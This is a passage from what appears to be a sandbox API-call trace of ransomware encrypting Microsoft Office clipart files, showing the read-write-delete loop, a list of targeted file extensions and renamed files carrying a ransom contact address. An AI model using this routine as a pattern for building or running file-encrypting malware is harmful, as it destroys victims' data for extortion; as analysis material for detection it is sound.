nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x14ff, lpOverlapped=0x0) returned 1 [0061.628] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1500, lpOverlapped=0x0) returned 1 [0061.629] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.629] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.629] SetEndOfFile (hFile=0x344) returned 1 [0061.642] CloseHandle (hObject=0x344) returned 1 [0061.642] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.642] SetEndOfFile (hFile=0x350) returned 1 [0061.643] CloseHandle (hObject=0x350) returned 1 [0061.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.654] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0061.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.654] lstrlenW (lpString=".doc") returned 4 [0061.654] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.654] lstrlenW (lpString=".docx") returned 5 [0061.655] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.655] lstrlenW (lpString=".pdf") returned 4 [0061.655] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString=".xls") returned 4 [0061.655] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString=".xlsx") returned 5 [0061.655] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.655] lstrlenW (lpString=".ppt") returned 4 [0061.655] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.655] lstrlenW (lpString=".zip") returned 4 [0061.655] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString=".rar") returned 4 [0061.655] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString=".bz2") returned 4 [0061.655] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.655] lstrlenW (lpString=".7z") returned 3 [0061.655] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.655] lstrlenW (lpString=".dbf") returned 4 [0061.655] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.655] lstrlenW (lpString=".1cd") returned 4 [0061.655] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.655] lstrlenW (lpString=".jpg") returned 4 [0061.655] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.656] lstrlenW (lpString=".doc") returned 4 [0061.656] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.656] lstrlenW (lpString=".docx") returned 5 [0061.656] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.656] lstrlenW (lpString=".pdf") returned 4 [0061.656] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.656] lstrlenW (lpString=".xls") returned 4 [0061.656] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.656] lstrlenW (lpString=".xlsx") returned 5 [0061.656] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.656] lstrlenW (lpString=".ppt") returned 4 [0061.656] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.656] lstrlenW (lpString=".zip") returned 4 [0061.656] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.656] lstrlenW (lpString=".rar") returned 4 [0061.656] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.656] lstrlenW (lpString=".bz2") returned 4 [0061.656] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.656] lstrlenW (lpString=".7z") returned 3 [0061.656] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.656] lstrlenW (lpString=".dbf") returned 4 [0061.656] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.656] lstrlenW (lpString=".1cd") returned 4 [0061.656] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 68 [0061.656] lstrlenW (lpString=".jpg") returned 4 [0061.656] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.666] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.666] lstrlenW (lpString="AG00176_.GIF") returned 12 [0061.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.666] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3120) returned 1 [0061.666] CloseHandle (hObject=0x368) returned 1 [0061.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 0x220 [0061.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.667] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.667] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.667] GetLastError () returned 0x0 [0061.667] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xc30, lpOverlapped=0x0) returned 1 [0061.827] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xc40, lpOverlapped=0x0) returned 1 [0061.827] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.827] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.828] SetEndOfFile (hFile=0x370) returned 1 [0061.828] CloseHandle (hObject=0x370) returned 1 [0061.828] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.828] SetEndOfFile (hFile=0x368) returned 1 [0061.829] CloseHandle (hObject=0x368) returned 1 [0061.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.829] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0061.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.830] lstrlenW (lpString=".doc") returned 4 [0061.830] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.830] lstrlenW (lpString=".docx") returned 5 [0061.830] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.830] lstrlenW (lpString=".pdf") returned 4 [0061.830] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.830] lstrlenW (lpString=".xls") returned 4 [0061.830] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.830] lstrlenW (lpString=".xlsx") returned 5 [0061.830] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.830] lstrlenW (lpString=".ppt") returned 4 [0061.830] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.830] lstrlenW (lpString=".zip") returned 4 [0061.830] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.830] lstrlenW (lpString=".rar") returned 4 [0061.830] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.830] lstrlenW (lpString=".bz2") returned 4 [0061.830] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.830] lstrlenW (lpString=".7z") returned 3 [0061.830] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.830] lstrlenW (lpString=".dbf") returned 4 [0061.830] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.830] lstrlenW (lpString=".1cd") returned 4 [0061.830] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".jpg") returned 4 [0061.831] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".doc") returned 4 [0061.831] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.831] lstrlenW (lpString=".docx") returned 5 [0061.831] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.831] lstrlenW (lpString=".pdf") returned 4 [0061.831] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString=".xls") returned 4 [0061.831] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString=".xlsx") returned 5 [0061.831] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.831] lstrlenW (lpString=".ppt") returned 4 [0061.831] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".zip") returned 4 [0061.831] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString=".rar") returned 4 [0061.831] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.831] lstrlenW (lpString=".bz2") returned 4 [0061.831] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.831] lstrlenW (lpString=".7z") returned 3 [0061.831] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".dbf") returned 4 [0061.831] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".1cd") returned 4 [0061.831] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0061.831] lstrlenW (lpString=".jpg") returned 4 [0061.831] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.832] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.832] lstrlenW (lpString="AN00015_.WMF") returned 12 [0061.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.832] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4734) returned 1 [0061.832] CloseHandle (hObject=0x368) returned 1 [0061.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 0x220 [0061.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.832] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.832] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.833] GetLastError () returned 0x0 [0061.833] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x127e, lpOverlapped=0x0) returned 1 [0061.843] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1280, lpOverlapped=0x0) returned 1 [0061.844] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.844] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.844] SetEndOfFile (hFile=0x370) returned 1 [0061.847] CloseHandle (hObject=0x370) returned 1 [0061.858] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.858] SetEndOfFile (hFile=0x368) returned 1 [0061.867] CloseHandle (hObject=0x368) returned 1 [0061.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.869] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.869] lstrlenW (lpString=".doc") returned 4 [0061.869] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".docx") returned 5 [0061.869] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.869] lstrlenW (lpString=".pdf") returned 4 [0061.869] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".xls") returned 4 [0061.869] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.869] lstrlenW (lpString=".xlsx") returned 5 [0061.869] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.869] lstrlenW (lpString=".ppt") returned 4 [0061.869] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.869] lstrlenW (lpString=".zip") returned 4 [0061.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.869] lstrlenW (lpString=".rar") returned 4 [0061.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString=".bz2") returned 4 [0061.870] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString=".7z") returned 3 [0061.870] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString=".dbf") returned 4 [0061.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString=".1cd") returned 4 [0061.870] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString=".jpg") returned 4 [0061.870] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString=".doc") returned 4 [0061.870] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString=".docx") returned 5 [0061.870] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.870] lstrlenW (lpString=".pdf") returned 4 [0061.870] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString=".xls") returned 4 [0061.870] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.870] lstrlenW (lpString=".xlsx") returned 5 [0061.870] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.870] lstrlenW (lpString=".ppt") returned 4 [0061.870] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.870] lstrlenW (lpString=".zip") returned 4 [0061.870] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.870] lstrlenW (lpString=".rar") returned 4 [0061.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString=".bz2") returned 4 [0061.871] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.871] lstrlenW (lpString=".7z") returned 3 [0061.871] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.871] lstrlenW (lpString=".dbf") returned 4 [0061.871] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.871] lstrlenW (lpString=".1cd") returned 4 [0061.871] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 68 [0061.871] lstrlenW (lpString=".jpg") returned 4 [0061.871] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.871] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.871] lstrlenW (lpString="AN00932_.WMF") returned 12 [0061.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.872] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=14428) returned 1 [0061.872] CloseHandle (hObject=0x350) returned 1 [0061.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 0x220 [0061.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.872] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.872] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.874] GetLastError () returned 0x0 [0061.874] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x385c, lpOverlapped=0x0) returned 1 [0061.970] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3860, lpOverlapped=0x0) returned 1 [0061.970] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, 